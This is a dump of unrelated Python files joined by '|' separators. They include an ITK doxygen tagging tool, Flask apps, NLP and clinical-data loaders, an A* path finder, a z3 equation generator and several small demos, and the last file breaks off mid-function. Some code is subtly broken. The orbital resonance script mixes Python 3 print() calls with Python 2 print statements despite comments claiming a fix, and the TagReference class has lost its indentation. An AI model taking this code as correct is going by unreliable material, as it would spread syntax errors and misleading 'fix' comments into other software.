    """Print the command-line help for mdoc.py to stdout."""
    message = """usage: mdoc.py set group file [files...]
Add the tag "\\ingroup group" to all the doxygen comment with a \\class
tag in it.
usage: mdoc.py check group file [files...]
Check that the tag "\\ingroup group" is in all the doxygen comment with a \\class
tag in it. If the tag is not there, a warning is displayed with the file name, the
line number and the class name. The return value is 0 when all the doxygen comments
have the tag, and 1 when at least one doxygen comment don't have it.
usage: mdoc.py massive-set [ITK-source]
Add the tag "\\ingroup module" to all the headers in ITK, where 'module' is the
module name of the header.
usage: mdoc.py massive-check [ITK-source]
Check that all the headers in ITK have their module name in their \\ingroup tag.
As for 'check', a warning is displayed if the tag is missing and 1 is returned.
\n"""
    sys.stdout.write(message)
def setGroup(fname, group):
    """Add '\\ingroup group' to every doxygen class comment in fname.

    The file is rewritten in place. Comments that already carry the group,
    and the '\\class classname' template comment, are left untouched.
    """
    with open(fname, "r", encoding="utf-8") as f:
        fcontent = f.read()
    out = io.StringIO()
    last = 0
    # walk every /** ... */ doxygen comment
    for m in re.finditer(r"/\*\*(.*?)\*/", fcontent, re.DOTALL):
        # write what is before the doxygen field to the output
        out.write(fcontent[last : m.start(1)])
        last = m.end(1)
        dcontent = m.group(1)
        # we don't care about doxygen fields not about a class
        if r"\class" in dcontent and dcontent != r" \class classname ":
            # do we have a line with the expected content?
            # fix: the backslash must be escaped (r"\\ingroup") -- the old
            # r"\ingroup" is an invalid regex escape and raises re.error on
            # Python 3.7+; this now matches checkGroup's pattern.
            if re.search(r"\\ingroup .*" + group + r"(\s|$)", dcontent, re.MULTILINE):
                # yes - just keep the content unchanged
                out.write(dcontent)
            else:
                # add the expected group
                if "\n" in dcontent:
                    # multiline content: find the indent used for the '*'
                    indent = re.search(r"( *)(\*|$)", dcontent).group(1)
                    lastLine = dcontent.splitlines()[-1]
                    if re.match(r"^ *$", lastLine):
                        # comment already ends with a blank '*' line
                        out.write(dcontent + "* \\ingroup " + group + "\n" + indent)
                    else:
                        out.write(
                            dcontent.rstrip()
                            + "\n"
                            + indent
                            + "* \\ingroup "
                            + group
                            + "\n"
                            + indent
                        )
                else:
                    # single-line comment
                    out.write(dcontent + " \\ingroup " + group + " ")
        else:
            out.write(dcontent)
    out.write(fcontent[last:])
    # we can save the content to the original file
    with open(fname, "w", encoding="utf-8") as f:
        f.write(out.getvalue())
def checkGroup(fname, group):
    """Return 1 (printing one warning per offence to stderr) when any doxygen
    class comment in fname is missing '\\ingroup group'; return 0 otherwise."""
    with open(fname, "r", encoding="utf-8") as f:
        fcontent = f.read()
    ret = 0
    expected = r"\\ingroup .*" + group + r"(\s|$)"
    for m in re.finditer(r"/\*\*(.*?)\*/", fcontent, re.DOTALL):
        dcontent = m.group(1)
        # skip doxygen comments that do not document a class, plus the
        # '\class classname' template comment
        if r"\class" not in dcontent or dcontent == r" \class classname ":
            continue
        if re.search(expected, dcontent, re.MULTILINE):
            continue
        # tag missing: report file, line number and class name
        cname = re.search(r"\\class +([^ ]*)", dcontent).group(1).strip()
        line = len(fcontent[: m.start(1)].splitlines())
        sys.stderr.write(
            r'%s:%s: error: "\ingroup %s" not set in class %s.'
            % (fname, line, group, cname)
            + "\n"
        )
        ret = 1
    return ret
def main():
    """Dispatch on the first command-line argument.

    Commands: set, check, massive-set, massive-check (see usage()).
    Returns the process exit status (0 on success, 1 on error).
    """
    # fix: guard against a missing command instead of raising IndexError
    if len(sys.argv) < 2:
        usage()
        return 1
    command = sys.argv[1]
    if command == "set":
        if len(sys.argv) < 4:
            usage()
            return 1
        # second arg is the module name, and the rest are the files to process
        module = sys.argv[2]
        files = sys.argv[3:]
        for fname in files:
            setGroup(fname, module)
        return 0
    elif command == "massive-set":
        # optional second arg is the ITK source tree (default ../.. from here)
        if len(sys.argv) >= 3:
            d = sys.argv[2]
        else:
            d = sys.path[0] + "/../.."
        cmm = os.path.abspath(d + "/*/*/*/itk-module.cmake")
        for fname in glob.glob(cmm):
            # fix: the legacy builtin file() does not exist on Python 3
            # (and never accepted encoding=) -- use open() instead
            with open(fname, "r", encoding="utf-8") as f:
                mcontent = f.read()
            module = re.search(r"itk_module\(([^ )]+)", mcontent).group(1)
            dname = os.path.dirname(fname)
            for fname2 in glob.glob(dname + "/include/*.h"):
                setGroup(fname2, module)
        return 0
    elif command == "check":
        if len(sys.argv) < 4:
            usage()
            return 1
        # second arg is the module name, and the rest are the files to process
        module = sys.argv[2]
        files = sys.argv[3:]
        ret = 0
        count = 0
        for fname in files:
            if os.path.isdir(fname):
                # a directory argument means "check every header inside"
                for fname2 in glob.glob(fname + "/*.h"):
                    count += 1
                    ret = max(ret, checkGroup(fname2, module))
            else:
                count += 1
                ret = max(ret, checkGroup(fname, module))
        sys.stderr.write(str(count) + " headers checked." + "\n")
        return ret
    elif command == "massive-check":
        if len(sys.argv) >= 3:
            d = sys.argv[2]
        else:
            d = sys.path[0] + "/../.."
        cmm = os.path.abspath(d + "/*/*/*/itk-module.cmake")
        ret = 0
        count = 0
        for fname in glob.glob(cmm):
            # fix: file() -> open(), as above
            with open(fname, "r", encoding="utf-8") as f:
                mcontent = f.read()
            module = re.search(r"itk_module\(([^ )]+)", mcontent).group(1)
            dname = os.path.dirname(fname)
            for fname2 in glob.glob(dname + "/include/*.h"):
                count += 1
                ret = max(ret, checkGroup(fname2, module))
        sys.stderr.write(str(count) + " headers checked." + "\n")
        return ret
    else:
        # fix: the message was missing the space before the command name
        sys.stderr.write("Unknown command " + command + "\n")
        usage()
        return 1
# Script entry point: exit with main()'s return code.
if __name__ == "__main__":
    ret = main()
    sys.exit(ret)
|
def multipes():
    """Print the sum of all natural numbers below 1000 divisible by 3 or 5.

    (Project Euler problem 1; the answer is 233168.)
    """
    # fix: Python 2 print statement -> print() call; manual accumulation
    # replaced with the sum-over-generator idiom
    total = sum(i for i in range(1000) if i % 3 == 0 or i % 5 == 0)
    print(total)
multipes()
|
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import traceback
import logging
import os
from common import constants
from common import config
from common import secret_keys as sk
from backend.eclipse2017_photo_app import Eclipse2017PhotoApp
from werkzeug.urls import url_encode
# Point every Google Cloud client library at the service-account key file.
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = constants.SERVICE_ACCOUNT_PATH
logging.basicConfig(level=logging.INFO, format=constants.LOG_FMT_S_THREADED)
# Flask application wired with OAuth2 credentials; debug disabled for prod.
app = Eclipse2017PhotoApp(config.PROJECT_ID, sk.FLASK_SESSION_ENC_KEY,
                          sk.GOOGLE_OAUTH2_CLIENT_ID,
                          sk.GOOGLE_OAUTH2_CLIENT_SECRET,
                          debug=False)
# This is a disgusting hacky work-around for the fact that flask looks at the
# url scheme of individual requests before looking at the PREFERRED_URL_SCHEME
# config value. All our requests have an http url scheme as they come as http
# requests from nginx to gunicorn/flask. See more info here:
# http://stackoverflow.com/questions/34802316/make-flasks-url-for-use-the-https-scheme-in-an-aws-load-balancer-without-mess
def _force_https():
    """Force url_for() to emit https URLs for the current request.

    Requests reach gunicorn/flask over plain http (from nginx), so flask
    would otherwise build http links; rewrite the adapter's scheme.
    """
    from flask import _request_ctx_stack
    reqctx = _request_ctx_stack.top
    # fix: guard the request context itself -- the imported stack object is
    # always non-None, but .top is None outside a request, which would make
    # the attribute access below raise AttributeError.
    if reqctx is not None:
        reqctx.url_adapter.url_scheme = 'https'
# Run the scheme rewrite before every request.
app.before_request(_force_https)
@app.errorhandler(Exception)
def all_exception_handler(error):
    """Catch-all handler: log the traceback and return a generic 500."""
    traceback.print_exc()
    # fix: pass the argument lazily (%-style args) instead of pre-formatting
    # with '%' -- same output, but formatting is skipped when disabled
    logging.error("internal server error: %s", error)
    return 'Internal server error', 500
|
from paddlenlp.data import Stack, Pad, Tuple, np
from paddlenlp.datasets import load_dataset
from paddlenlp.transformers import ErnieGramTokenizer, ErnieTokenizer
from lib.base_data_module import BaseDataModule
class ReadingComprehensionDataModule(BaseDataModule):
    """Data module for extractive reading comprehension on DuReader-robust.

    Tokenizes (question, context) pairs with an ERNIE tokenizer and labels
    each tokenized span with answer start/end token positions, so a span
    extraction model can be trained on it.
    """
    def __init__(self, batch_size=32, max_seq_length=512):
        super().__init__(ErnieTokenizer.from_pretrained('ernie-1.0'), batch_size, max_seq_length)
    def load_dataset(self):
        # returns the train/dev/test splits of the DuReader-robust dataset
        return load_dataset("dureader_robust", splits=["train", "dev", "test"])
    def convert_example(self, examples, is_predict=False):
        """Convert text examples into token ids with answer-span labels."""
        """
        {
            'id': '7de192d6adf7d60ba73ba25cf590cc1e',
            'title': '',
            'context': '选择燃气热水器时,一定要关注这几个问题:1、出水稳定性要好,不能出现忽热忽冷的现象2、快速到达设定的需求水温3、操作要智能、方便4、安全性要好,要装有安全报警装置 市场上燃气热水器品牌众多,购买时还需多加对比和仔细鉴别。方太今年主打的磁化恒温热水器在使用体验方面做了全面升级:9秒速热,可快速进入洗浴模式;水温持久稳定,不会出现忽热忽冷的现象,并通过水量伺服技术将出水温度精确控制在±0.5℃,可满足家里宝贝敏感肌肤洗护需求;配备CO和CH4双气体报警装置更安全(市场上一般多为CO单气体报警)。另外,这款热水器还有智能WIFI互联功能,只需下载个手机APP即可用手机远程操作热水器,实现精准调节水温,满足家人多样化的洗浴需求。当然方太的磁化恒温系列主要的是增加磁化功能,可以有效吸附水中的铁锈、铁屑等微小杂质,防止细菌滋生,使沐浴水质更洁净,长期使用磁化水沐浴更利于身体健康。',
            'question': '燃气热水器哪个牌子好',
            'answers': ['方太'],
            'answer_starts': [110]
        }
        """
        # long contexts are split into overlapping spans of this stride
        doc_stride = 128
        contexts = [examples[i]['context'] for i in range(len(examples))]
        questions = [examples[i]['question'] for i in range(len(examples))]
        tokenized_examples = self.tokenizer(
            questions,
            contexts,
            stride=doc_stride,
            max_seq_len=self.max_seq_length)
        # Let's label those examples!
        for i, tokenized_example in enumerate(tokenized_examples):
            # We will label impossible answers with the index of the CLS token.
            input_ids = tokenized_example["input_ids"]
            cls_index = input_ids.index(self.tokenizer.cls_token_id)
            # The offset mappings will give us a map from token to character position in the original context. This will
            # help us compute the start_positions and end_positions.
            offsets = tokenized_example['offset_mapping']
            # Grab the sequence corresponding to that example (to know what is the context and what is the question).
            # token_type_ids: 0 marks question tokens, 1 marks context tokens
            sequence_ids = tokenized_example['token_type_ids']
            # One example can give several spans, this is the index of the example containing this span of text.
            sample_index = tokenized_example['overflow_to_sample']
            answers = examples[sample_index]['answers']
            answer_starts = examples[sample_index]['answer_starts']
            # Start/end character index of the answer in the text.
            start_char = answer_starts[0]
            end_char = start_char + len(answers[0])
            # Start token index of the current span in the text.
            # NOTE(review): assumes every span contains at least one context
            # token (type id 1); otherwise this scan walks off the end.
            token_start_index = 0
            while sequence_ids[token_start_index] != 1:
                token_start_index += 1
            # End token index of the current span in the text.
            token_end_index = len(input_ids) - 1
            while sequence_ids[token_end_index] != 1:
                token_end_index -= 1
            # Minus one more to reach actual text
            token_end_index -= 1
            # Detect if the answer is out of the span (in which case this feature is labeled with the CLS index).
            if not (offsets[token_start_index][0] <= start_char and
                    offsets[token_end_index][1] >= end_char):
                tokenized_examples[i]["start_positions"] = cls_index
                tokenized_examples[i]["end_positions"] = cls_index
            else:
                # Otherwise move the token_start_index and token_end_index to the two ends of the answer.
                # Note: we could go after the last offset if the answer is the last word (edge case).
                while token_start_index < len(offsets) and offsets[token_start_index][0] <= start_char:
                    token_start_index += 1
                tokenized_examples[i]["start_positions"] = token_start_index - 1
                while offsets[token_end_index][1] >= end_char:
                    token_end_index -= 1
                tokenized_examples[i]["end_positions"] = token_end_index + 1
        return tokenized_examples
        # contexts = [examples[i]['context'] for i in range(len(examples))]
        # questions = [examples[i]['question'] for i in range(len(examples))]
        #
        # query, title = examples["query"], examples["title"]
        #
        # encoded_inputs = self.tokenizer(
        #     text=query, text_pair=title, max_seq_len=self.max_seq_length)
        #
        # input_ids = encoded_inputs["input_ids"]
        # token_type_ids = encoded_inputs["token_type_ids"]
        #
        # if is_predict:
        #     return input_ids, token_type_ids
        # else:
        #     label = np.array([example["label"]], dtype="int64")
        #     return input_ids, token_type_ids, label
    def batchify_fn(self, is_predict=False):
        """Build the collate function that pads a batch to equal length."""
        fn_list = [
            Pad(axis=0, pad_val=self.tokenizer.pad_token_id),  # input_ids
            Pad(axis=0, pad_val=self.tokenizer.pad_token_type_id)  # token_type_ids
        ]
        if not is_predict:
            fn_list.append(Stack(dtype="int64"))  # labels
        batchify_fn = lambda samples, fn=Tuple(fn_list): [data for data in fn(samples)]
        return batchify_fn
# Smoke check: load the splits and show the first two training examples.
train_ds, dev_ds, test_ds = load_dataset('dureader_robust', splits=('train', 'dev', 'test'))
for idx in range(2):
    print(train_ds[idx])
    print()
|
import os
from collections import Counter
from random import shuffle
from typing import List
from tqdm.autonotebook import tqdm
from dataloader.data import MIMICDataset, TabularFeature, get_tables
from dataloader.utils import Event
def extract_sentences(dataset, tables: List[TabularFeature], event_class=Event, suffix='', **params):
    """Write one token 'sentence' per table time step to embeddings/sentences<suffix>.txt.

    A sentence is the set of event texts occurring at one time step; patients
    are separated by blank lines. Also writes a '<file>.counts' companion
    with token frequencies, and returns the Counter of token counts.
    """
    # fix: the output directory must exist BEFORE the first open() below;
    # previously makedirs only ran after the sentences file had been opened.
    os.makedirs('embeddings', exist_ok=True)
    token_counter = Counter()
    with open(f'embeddings/sentences{suffix}.txt', 'w') as f:
        for sample in tqdm(dataset, desc='extract sentences'):
            for table in tables:
                for t, step in sample['inputs'][table.table]:
                    # deduplicate tokens within one time step
                    sentence = set()
                    for label, value in step:
                        event = event_class(table, label, value, time=t, **params)
                        sentence.add(event.text)
                    if sentence:
                        f.write(' '.join(sentence) + '\n')
                        token_counter.update(sentence)
            # separate patients with a blank line
            f.write('\n')
    with open(f'embeddings/sentences{suffix}.txt.counts', 'w') as f:
        for token, count in token_counter.most_common():
            f.write(f'{token} {count}\n')
    return token_counter
if __name__ == '__main__':
    DEVICE = 'cpu'
    # Discretize the clinical tables into 12 value bins; load=False forces a fresh fit.
    dem, chart, lab, output = get_tables(['CHARTEVENTS', 'LABEVENTS', 'OUTPUTEVENTS', 'dem'],
                                         load=False,
                                         n_bins=12)
    from dataloader.labels import get_labels
    labels = get_labels(DEVICE)
    tables = [chart, lab, output, dem]
    # Use train and validation set to generate sentences for fasttext
    train_set = MIMICDataset(datalist_file='train_listfile.csv',
                             base_path='mimic3-benchmarks/data/multitask',
                             datasplit='train', mode='EVAL',
                             tables=tables, labels=labels)
    # generate cache: fit each table's binning on the training set and persist it
    for table in tables:
        table.fit(train_set)
        table.save()
    # demographics are excluded from the sentence dump
    tables = [chart, lab, output]
    extract_sentences(train_set,
                      tables,
                      suffix='.mimic3',
                      event_class=Event)
|
from django.apps import AppConfig
class TweetGeneratorConfig(AppConfig):
    """Django application configuration for the Tweet_Generator app."""
    name = 'Tweet_Generator'
|
#!/usr/bin/env python
##### !/usr/local/bin/python
##### !/usr/bin/python # for DPH mac
import numpy as np
import math
import os
import matplotlib.pyplot as plt
import sys
import glob
from math import log10, floor
from decimal import *
import matplotlib.cm as cm
import random
from scipy.interpolate import interp1d
from hnread import *
from center_angle import *
def checkinput(argv):
    """Validate the command-line arguments; print help and exit(1) on bad input.

    Expects exactly three positional arguments, all non-negative:
    ring distance (planet radii), start position, end position.
    """
    programname = sys.argv[0]
    # fix: Python 2 print statements replaced with print() calls, which
    # behave identically here on both Python 2 and 3 (single argument)
    if len(argv) != 4:  # exit unless exactly three arguments were given
        print('---------------------------------------------------------------------------')
        print("This program calculates the resonances between two distances for resonaces smaller than 20, it takes into three arguments:\n Argument 1: Distance of the ring in planet radii\n Argument 2/3: starting/ending position")
        print(' ')
        print(' Example: '+programname+' 2.001 2.23 2.25')
        print('---------------------------------------------------------------------------')
        sys.exit(1)
    if float(argv[1])<0 or float(argv[2])<0 or float(argv[3])<0:  # exit if any distance is negative
        print('ERROR: Distances must be positive ')
        sys.exit(1)
# Validate CLI arguments before doing any work.
checkinput(sys.argv)
def calcR(f, b, dis):
    """Distance of the b:f mean-motion resonance relative to distance dis
    (period ratio to the power 2/3, per Kepler's third law)."""
    period_ratio = float(b) / float(f)
    return period_ratio ** (2. / 3.) * dis
# Ring distance (planet radii) and the scan interval, ordered low to high.
Rdis=float(sys.argv[1])
Dis_i=min([float(i) for i in [sys.argv[2],sys.argv[3]]])
Dis_f=max([float(i) for i in [sys.argv[2],sys.argv[3]]])
# Integer resonance components 1..20 for both sides of the ratio.
Ref = [float(j) for j in [i+1 for i in range(20)]]
Reb = [float(j) for j in [i+1 for i in range(20)]]
Dis=[]
DisS=[]
Resonance=[]
OrderR=[]
#print Dis_i
#print Dis_f
# Try every b:f pair (skipping 1:1 etc.) and keep those whose resonance
# distance falls inside the requested interval.
for f in Ref:
    for b in Reb:
        if f==b:
            continue
        else:
            DisU=calcR(f,b,Rdis)
            if DisU>Dis_i and DisU<Dis_f:
                Resonance.append(str(int(b))+":"+str(int(f)))
                OrderR.append(abs(int(b)-int(f)))
                Dis.append(DisU)
                DisS.append(DisU-0.02)
#	Resonance.append(str(int(b))+":"+str(int(f)))
#	Dis.append(DisU)
#	DisS.append(DisU-0.02)
if len(Dis)==0:
    print "No resonances found!"
else:
    # Sort all four parallel lists by distance before printing the table.
    Dis,DisS,Resonance,OrderR=zip(*sorted(zip(Dis,DisS,Resonance,OrderR)))
    print "--distance ------- Resonance ------- Order ----"
    for i in range(len(Dis)):
        print str(Dis[i])+"        "+Resonance[i]+"       "+str(OrderR[i])
#if len(Ref)==1 and len(Reb)==1:
#    print str(Ref)+":"+str(Reb)+"    "+str(calcR(Ref,Reb,Rdis))
|
import ast_node
class TagReference(ast_node.AstNode):
def __init__(self, ref_name):
self.ref_name = ref_name
def get_value(self):
return '%placeholder_value%'
def execute(self, tag_context):
return tag_context.get_tag_value(self.ref_name)
def set_value(self, tag_context, value):
tag_context.set_tag_value(self.ref_name, value)
|
# Process pool demo
from multiprocessing.pool import Pool
import multiprocessing
import time
import os
import random
# NOTE: the triple-quoted block below is disabled demo code (a bare string
# expression, never executed) showing Pool.apply_async with close/join/terminate.
'''
def run(name):
    print('{}子进程开始运行, 进程id是{}'.format(name, os.getpid()))
    start_time = time.time()
    time.sleep(random.choice([1,2,3,4]))
    stop_time = time.time()
    print('{}子进程结束, 进程id是{},运行时间:{}'.format(name, os.getpid(), stop_time - start_time))
cpu_num = multiprocessing.cpu_count()
print(cpu_num)
p = Pool(cpu_num)
for i in range(10):
    p.apply_async(run, args = (i,))
# close关闭进程池,关闭之后不能在添加进程
p.close() # 温柔结束进程,会等待进程池中的任务结束
# 对于进程池,在join之前一定要先close
p.join() # 进程池对象调用join,,会等待进程池中所有的进程结束
p.terminate() # 强制结束进程
'''
# Retrieving return values from pool processes
def f(n):
    """Echo n and return its square (demo task for the pool)."""
    print(n)
    squared = n * n
    return squared
l = []
with Pool(processes = 4) as pool:
    res = pool.apply_async(f, args = (2,))
    l.append(res)
    # get() blocks until the task completes -- can it only wait after the
    # process has started?
    print(res.get())
    res = pool.apply_async(time.sleep, args = (3,))
    # print(res.get())
    l.append(res)
|
import numpy as np
import math as m
import os.path
import subprocess
import cosmolopy as cosmos
import multiprocessing as mp
# --- Local ---
from Spectrum import data as spec_data
from Spectrum import fft as spec_fft
from Spectrum import spec as spec_spec
from Spectrum import fortran as spec_fort
def bisp_wrapper(i_mock):
    """Compute and store the bispectrum for PATCHY mock number i_mock."""
    # catalog dictionary identifying which mock realization to process
    catalog_info = {'name': 'patchy', 'n_mock': i_mock}
    spec = spec_spec.Spec('bispec', {'catalog': catalog_info})
    spec.calculate()
    return None
def build_bisp_patchy(Nthreads):
    """Calculate bispectra for PATCHY mocks 1..1000 in parallel using Nthreads worker processes."""
    pool = mp.Pool(processes=Nthreads)
    try:
        # Pool.map is synchronous, so all work is finished when it returns;
        # it also accepts the range directly (no need to copy into a list).
        pool.map(bisp_wrapper, range(1, 1001))
    finally:
        # fix: the canonical shutdown sequence is close() then join();
        # the old code wedged terminate() between them, which forcibly
        # killed workers that close() had just asked to finish gracefully.
        pool.close()
        pool.join()
    return
# Entry point: process all PATCHY mocks with 10 workers.
if __name__=='__main__':
    build_bisp_patchy(10)
|
#!/usr/bin/python
# One disassembly line per entry, e.g. 'byte_805F455 = 12' or a bare byte label.
bytelist = [x.strip() for x in open('bytes.txt','r').readlines()]
lin = open('linear_eqs.py','w')
lin.write("#!/usr/bin/python\nfrom z3 import *\n")
# Declare one z3 Int variable per unknown byte.
for i in range(26):
    lin.write("var_"+str(i)+" = Int('var_"+str(i)+"')\n")
lin.write("solve(")
def replacelabel(bytenum):
    """Map a disassembly byte label (e.g. 'byte_805F454') to its z3 variable name."""
    base_address = 0x805F454
    address = int(bytenum.split("_")[1], 16)
    return "var_" + str(address - base_address)
block = []
for line in bytelist:
    if "=" in line:
        # A '=' line closes an equation: the collected vars sum to its value.
        block.append(replacelabel(line.split()[0]))
        lin.write(' + '.join(block)+" == "+line.split()[2]+",")
        block = []
    elif "byte_" in line:
        # Bare byte label: accumulate it into the current equation.
        block.append(replacelabel(line))
lin.write(")")
lin.close()
|
import base64
account_username = 'email.address@gmail.com'
account_pass = base64.b64decode('dfshfksdjkhfgdsjkhgsdjk')
special_message_sender = 'secret.squirrel@gmail.com'
magic_subject_words = ['file', 'available']
wait_time_in_seconds = 10
file_source = 'localhost:/tmp/test_sourcedir'
file_dest = '/tmp/test_destdir'
|
# Author Sven Koppany
# This implements the a-star search algorithm
import numpy as np
import scipy.io
import random
from matplotlib import pyplot as plt
from matplotlib import animation
class astar:
    """Grid path finder using the A* algorithm with 4-connected movement.

    The world map is a 2-D array where 0 marks a free cell and non-zero
    marks an obstacle. The path is computed on construction and stored in
    self.path: a list of (row, col) tuples from goal back to start, or
    False when no path exists.
    """
    def __init__(self, worldMap, matlabMap = False, startAndGoalCoords = ((0,0),(4,4)), randomCoords = False):
        #Convert the matlab map to a numpy array
        if matlabMap == True:
            self.worldMap = np.asanyarray(scipy.io.loadmat(worldMap)['grid'])
            #change the walls to -1 so that the first path is recordable
            self.worldMap[self.worldMap == 1] = 255 #for better imaging
        #But if it is an numpy ndarray
        # NOTE(review): if worldMap is neither a .mat path nor an ndarray,
        # self.worldMap is never assigned and getAStarPath() will fail.
        elif type(worldMap) is np.ndarray:
            self.worldMap = worldMap
        #Generate random start and target coordinates in the map
        if randomCoords == True:
            self.startAndGoalCoords = self.getRandomLocations()
        else:
            self.startAndGoalCoords = startAndGoalCoords
        self.path = self.getAStarPath()
    def getRandomLocations(self):
        """Return a pair of distinct random (start, goal) free cells."""
        #
        def findEmptyLoc():
            # rejection-sample until an empty (value 0) cell is found
            while True:
                loc = (random.randint(0,self.worldMap.shape[0]-1),
                       random.randint(0,self.worldMap.shape[1]-1))
                if self.worldMap[loc] == 0:
                    break
            return loc
        while True:
            startLoc = findEmptyLoc()
            goalLoc = findEmptyLoc()
            if startLoc != goalLoc:
                break
        return (startLoc, goalLoc)
    def getAStarPath(self):
        """Run A* from start to goal; return the path (goal->start) or False."""
        world = self.worldMap #world map
        start = self.startAndGoalCoords[0] #starting location
        goal = self.startAndGoalCoords[1] #goal location
        closed = [] #closed cells
        frontier = {} #open cells with g-values
        frontier_f = {} # dict of f-values -> list of cells with that f
        cameFrom = {}  # child cell -> parent cell, for path reconstruction
        moveCost = 1
        def heuristicManh(cell): #the heuristic using Manhattan movement
            # NOTE(review): due to precedence only the x term is scaled by
            # moveCost; harmless while moveCost == 1, but parentheses around
            # the sum were probably intended.
            return abs(cell[0] - goal[0]) + abs(cell[1] - goal[1]) * moveCost
        def fValue(cell):
            # f = g (cost so far) + h (Manhattan estimate to goal)
            return frontier[cell] + heuristicManh(cell)
        def expandManh(cell): #expand with Manhattan movement
            limitY, limitX = world.shape #get the map limits
            cY, cX = cell #get the node coords
            options = []
            # collect the in-bounds, free (value 0) 4-neighbors
            if cY - 1 >= 0 and world[(cY - 1, cX)] == 0:
                options.append((cY - 1, cX))
            if cY + 1 < limitY and world[(cY + 1, cX)] == 0:
                options.append((cY + 1, cX))
            if cX - 1 >= 0 and world[(cY, cX - 1)] == 0:
                options.append((cY, cX - 1))
            if cX + 1 < limitX and world[(cY, cX + 1)] == 0:
                options.append((cY, cX + 1))
            return options
        def buildPath(cell):
            current = cell
            path = [cell]
            #Find the path from current(goal) back to start
            while current != start:
                current = cameFrom[current]
                path.append(current)
            return path
        #Put the starting cell into frontier,
        # g-value = 0, f-value = h + g
        frontier[start] = 0
        frontier_f[fValue(start)] = [start] #cal f-value and store it
        while bool(frontier): #while frontier is not empty
            #set current to the minimum f-value
            current = min(frontier_f.items(), key=lambda x: x[0])
            #save the lowest f-value and the current cell coords
            lowF = current[0]
            cell = current[1][0]
            #if the goal has been reached, find the shortest path
            if cell == goal:
                return buildPath(cell)
            #iterate through the neighbors
            neighbors = expandManh(cell)
            for i, v in enumerate(neighbors):
                #skip closed cells
                if v in closed:
                    continue
                #next g-value
                gScore = frontier[cell] + moveCost
                #if the neighbor is not in the open frontier
                # NOTE(review): textbook A* would also relax an already-open
                # neighbor when gScore is lower; this implementation leaves
                # open nodes untouched -- confirm that is acceptable for the
                # uniform-cost grids used here.
                if v not in frontier.keys():
                    #record its parent
                    cameFrom[v] = cell
                    #record the g-val and f-val
                    frontier[v] = gScore
                    fScore = fValue(v)
                    if fScore not in frontier_f.keys():
                        frontier_f[fScore] = [v]
                    else:
                        frontier_f[fScore].append(v)
            #move current cell to closed
            closed.append(cell)
            del frontier[cell]
            frontier_f[lowF].remove(cell)
            if frontier_f[lowF] == []:
                del frontier_f[lowF]
        return False
if __name__ == '__main__':
    #import map from MatLab
    # sometimes this times out
    #astarPath = astar(worldMap = 'staticMap_254.mat', matlabMap = True, startAndGoalCoords = ((20, 20),(500, 500)))
    # simple example: 0 = free cell, 1 = wall
    world = np.array([[0,0,0,0,1,0],
                      [0,0,0,0,1,0],
                      [0,0,0,0,1,0],
                      [0,1,1,1,1,0],
                      [0,0,0,1,0,0],
                      [0,0,0,0,0,0]])
    astarPath = astar(worldMap = world, matlabMap = False, startAndGoalCoords = ((3,5),(1,2)))
    # fix: print as a function so the script also runs on Python 3
    print(astarPath.path)
|
import json
import os
import time
from flask import Flask, Response, request
# Serve static assets from ./public, with index.html at the site root.
app = Flask(__name__, static_url_path='', static_folder='public')
app.add_url_rule('/', 'root', lambda: app.send_static_file('index.html'))
@app.route('/api/todo/list', methods=['GET', 'POST'])
def og_handler():
    """Return the stored todo list; on POST, append the submitted item first."""
    with open('todo.json', 'r') as f:
        todo = json.loads(f.read())
    if request.method == 'POST':
        new_todo = request.form.to_dict()
        # a millisecond timestamp doubles as a unique id
        new_todo['id'] = int(time.time() * 1000)
        todo.append(new_todo)
        with open('todo.json', 'w') as f:
            # pretty-print so the file stays human-editable
            f.write(json.dumps(todo, indent=4, separators=(',', ': ')))
    response_headers = {
        'Cache-Control': 'no-cache',
        'Access-Control-Allow-Origin': '*'
    }
    # send the JSON list back to be consumed by the view
    return Response(
        json.dumps(todo),
        status=200,
        mimetype='application/json',
        headers=response_headers
    )
@app.route('/api/todo/list', methods=['PUT'])
def sort_todo_handler():
    """Move a todo item from index 'from' to index 'to' and persist the new order."""
    data = request.get_json()
    # Open the json file for reading
    with open('todo.json', 'r') as f:
        todo = json.loads(f.read())
    todo.pop(data['from'])
    todo.insert(data['to'], data['data'])
    # Write the updates to the json file, pretty-printed
    with open('todo.json', 'w') as f:
        f.write(json.dumps(todo, indent=4, separators=(',', ': ')))
    # fix: actually send the updated list back -- the body expression had
    # been commented out, leaving an empty response, unlike the other
    # /api/todo handlers which all return the JSON list.
    return Response(
        json.dumps(todo),
        status=200,
        mimetype='application/json',
        headers={
            'Cache-Control': 'no-cache',
            'Access-Control-Allow-Origin': '*'
        }
    )
@app.route('/api/todo/list/checkbox', methods=['PUT'])
def checkbox_handler():
    """Set the checked state of one todo item, or of every item when no index is given."""
    data = request.get_json()
    with open('todo.json', 'r') as f:
        todo = json.loads(f.read())
    target = data['index']
    if target == "":
        # no specific checkbox targeted: apply the state to every item
        for index in range(len(todo)):
            todo[index]['checked'] = data['state']
    else:
        # set the current state of the targeted checkbox
        todo[target]['checked'] = data['state']
    # persist the update, pretty-printed
    with open('todo.json', 'w') as f:
        f.write(json.dumps(todo, indent=4, separators=(',', ': ')))
    # send the JSON list back to be consumed by the view
    return Response(
        json.dumps(todo),
        status=200,
        mimetype='application/json',
        headers={
            'Cache-Control': 'no-cache',
            'Access-Control-Allow-Origin': '*'
        }
    )
if __name__ == '__main__':
    # Default to port 3000 unless the PORT env var is set; debug reloader on.
    app.run(port=int(os.environ.get("PORT", 3000)), debug=True)
|
import numpy as np
import os
import skimage.io as io
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from shapely.geometry import Polygon as Pgon
def show_gt_mask(bbox_img, polygons, colors):
    """Overlay ground-truth segmentation polygons on a bounding-box image.

    Args:
        bbox_img (array): crop of the original image around the object
        polygons (array): matplotlib Polygon objects to draw
        colors (array): one color per polygon

    Returns:
        None; draws a translucent fill plus a solid outline on the current axes.
    """
    assert len(polygons) == len(colors)
    plt.imshow(bbox_img)
    axes = plt.gca()
    axes.set_autoscale_on(False)
    # translucent interior shading
    fill = PatchCollection(polygons, facecolor=colors, linewidths=0, alpha=0.4)
